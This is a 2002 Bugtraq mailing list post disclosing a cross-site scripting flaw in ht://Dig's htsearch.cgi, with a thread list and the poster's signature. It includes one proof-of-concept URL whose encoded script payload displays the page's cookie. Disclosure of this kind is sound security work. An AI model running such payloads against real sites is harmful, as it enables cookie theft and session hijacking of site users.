Bugtraq mailing list archives
XSS in HTDIG
From: Howard Yeend <h_bugtraq () yahoo com>
Date: Wed, 26 Jun 2002 01:38:48 -0700 (PDT)
Eg; http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E (all URLS must be on one line) Apologies if this is a known issue. Apologies also for posting about XSS, too, but this is not an isolated website, but a commonly used service. ===== -----BEGIN GEEK CODE BLOCK----- Version: 3.1 www.geekcode.com GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D-(Quake+++) G+++ e* h r++>+++ y+(+++) -----END GEEK CODE BLOCK----- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com
Current thread:
- XSS in HTDIG Howard Yeend (Jun 26)
- Re: XSS in HTDIG Peter Watkins (Jun 28)
- Re: XSS in HTDIG Henrik Edlund (Jun 28)
- Re: XSS in HTDIG webmaster (Stephen Ostermiller) (Jun 28)
- Re: XSS in HTDIG Peter Watkins (Jun 28)